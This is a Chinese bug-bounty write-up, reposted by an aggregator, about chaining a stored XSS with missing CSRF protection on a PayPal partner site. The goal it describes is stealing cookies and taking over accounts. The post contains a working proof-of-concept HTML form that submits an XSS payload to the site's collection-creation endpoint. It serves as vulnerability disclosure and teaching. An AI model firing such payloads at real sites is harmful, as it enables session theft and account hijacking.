挖洞经验 | 利用XSS和CSRF漏洞远程实现PayPal合作方网站未授权账户访问
Posted 疯猫网络
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了挖洞经验 | 利用XSS和CSRF漏洞远程实现PayPal合作方网站未授权账户访问相关的知识,希望对你有一定的参考价值。
继上次发现PayPal远程代码执行漏洞之后,我又通过CSRF和XSS方式发现了PayPal合作方网站的未授权账户访问漏洞,利用该漏洞可以远程窃取用户账户Cookie信息,实现账户劫持。
前言
在想办法绕过WAFs,或希望通过存储型XSS构造远程XSS攻击时,XSS漏洞的挖掘就派上了用场。在这有三个经典粟子大家可以仔细研究学习:
whitton : uber-turning-self-xss-into-good-xss
geekboy:airbnb-bug-bounty-turning-self-xss-into-good-xss-2
arbazhussain:self-xss-to-good-xss-clickjacking-6db43b44777e
如果你能发现某个WEB应用的存储型XSS漏洞,并且其对CSRF(跨站请求伪造)无任何防护措施时,那么,恭喜你,你挖到宝藏了!
开始
我有幸就发现了这么一个网站,PayPal合作方网站 https://www.paypal-brandcentral.com/,其中用来表示集合名称”Collection Name”的参数”name”,存在XSS漏洞,之后,经验证该网站没有采取任何CSRF攻击的防护措施。这就存在可利用之处了。
为了形成CSRF攻击,攻击者通过构建形如以下的恶意XSS Payload,发送至用户端,一旦用户点击该Payload框架中的链接,将会自动创建一个新的集合名称,同时执行窃取Cookie的操作或其它跳转,实现攻击者恶意目的。由于未采取任何CSRF攻击防护,攻击者可以利用该方法间接访问控制用户账户。
<html> <body> <form action="https://www.paypal-brandcentral.com/!/Lightbox/createNode/" method="POST"> <input type="hidden" name="name" value=""></title>"><svg/onload=prompt(document.cookie);>" /> <input type="hidden" name="itemId" value="0" /> <input type="hidden" name="itemType" value="" /> <input type="hidden" name="guid" value="" /> <input type="submit" value="Submit request" /> </form> </body></html>
结束
就是这么简单,一些大型网站或周边应用一样会存在我们根本无法想像的漏洞,只是需要大家细心去发现。当然,这并不全靠运气,还得认真打好基本功才行。
以上是关于挖洞经验 | 利用XSS和CSRF漏洞远程实现PayPal合作方网站未授权账户访问的主要内容,如果未能解决你的问题,请参考以下文章